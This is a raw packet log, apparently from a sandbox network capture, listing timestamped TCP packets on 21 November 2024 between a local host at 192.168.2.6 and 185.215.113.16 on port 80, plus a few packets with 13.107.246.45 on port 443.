                                                                                                                                                                              Nov 21, 2024 08:30:37.716444016 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.716856003 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.717149019 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.717273951 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.717464924 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.717982054 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.718100071 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.718261957 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.718822002 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.718957901 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.719110966 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.719626904 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.719753981 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.719981909 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.720437050 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.720551014 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.720698118 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.721240997 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.721364975 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.721519947 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.722093105 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.722196102 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.722389936 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.722871065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.723000050 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.723383904 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.723690987 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.723784924 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.723834038 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.724467993 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.779021978 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.883125067 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.883296967 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.883485079 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.883517027 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.883583069 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.883629084 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.884280920 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.884375095 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.885143042 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.885260105 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.885303020 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.885920048 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.886018038 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.886060953 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.886734962 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.886775970 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.886821032 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.887553930 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.887660980 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.888376951 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.888427019 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.888514042 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.889178038 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.889229059 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.889278889 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.889966965 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.890013933 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.890069008 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.890813112 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.890860081 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.890918016 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.891124010 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.891746998 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.891767025 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.891814947 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.892443895 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.892541885 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.892589092 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.893248081 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.893368959 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.893419981 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.894108057 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.894216061 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.894264936 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.894906044 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.895028114 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.895078897 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.895698071 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.895819902 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.895868063 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.896527052 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.896719933 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.896760941 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.897408009 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.897480011 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.898176908 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.898237944 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.898268938 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.898988008 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.899029016 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.899075031 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.899795055 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.899902105 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.899950981 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.900618076 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.900763988 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.900804996 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.901446104 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.901572943 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.901616096 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.902268887 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.902435064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.902493000 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.903116941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.903242111 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.903928041 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.904006958 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.904050112 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.904364109 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.904767036 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.904831886 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.905160904 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.905620098 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.905716896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.906354904 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.906419039 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.906466007 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.907171011 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.907303095 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.908014059 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.908093929 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.908148050 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.908833027 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.908972025 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.909032106 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.909621954 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.909745932 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.909790039 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.910423994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.910546064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.910588026 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.911257982 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.911391020 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.912110090 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.912179947 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.912230015 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.912909985 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.913047075 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.913099051 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.913705111 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.913940907 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.913981915 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.914535046 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.914666891 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.915250063 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.915364027 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.915489912 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.915524960 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.916177034 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.916318893 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.916359901 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.917021036 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.917134047 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.917176008 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.917808056 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.917952061 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.917994022 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.918628931 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.918745041 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.918787003 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.919430017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.919531107 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.920227051 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.920274019 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.920377016 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.921098948 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.921144962 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.921230078 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.921895027 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.921948910 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.922013998 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.922719955 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.922768116 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.922806025 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.923499107 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.923567057 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.923671007 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.923715115 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.924328089 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.924455881 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.924508095 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.925153017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.925259113 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.925319910 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.925925970 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.964015961 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:37.977519035 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.977684975 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:37.979284048 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:38.085097075 CET4434976913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.085319042 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.085340977 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.085418940 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.085463047 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.085638046 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.085680962 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.085966110 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.086134911 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.086184025 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.086815119 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.086981058 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.087024927 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.087678909 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.087798119 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.088495016 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.088536978 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.088572979 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.089286089 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.089327097 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.089426041 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.090224028 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.090254068 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.090264082 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.090931892 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.090976954 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.091032982 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.091361046 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.091732979 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.091881990 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.091921091 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.092533112 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.092653036 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.092699051 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.093353987 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.093497992 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.093537092 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.094180107 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.094300032 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.094340086 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.094990969 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.095129013 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.095830917 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.095920086 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.095972061 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.098825932 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.098875999 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.098922968 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.098929882 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.098941088 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.098967075 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.098983049 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.098993063 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.099028111 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.099046946 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.099339962 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.099397898 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.100469112 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.100651979 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.100696087 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.101557970 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.101820946 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.101861954 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.102054119 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.102078915 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.102113008 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.102432013 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.102699041 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.102739096 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.103272915 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.103434086 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.104279041 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.104326010 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.104377985 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.105063915 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.105081081 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.105103016 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.105135918 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.105618000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.105830908 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.106453896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.106702089 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.106744051 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.107728004 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.107745886 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.108357906 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.108403921 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.108515024 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.108944893 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.108988047 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.109249115 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.110004902 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.110025883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.110044003 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.110065937 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.110560894 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.111054897 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.111568928 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.111727953 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.111793995 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.112231970 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.112415075 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:38.112452984 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                              Nov 21, 2024 08:30:38.113174915 CET8049762185.215.113.16192.168.2.6
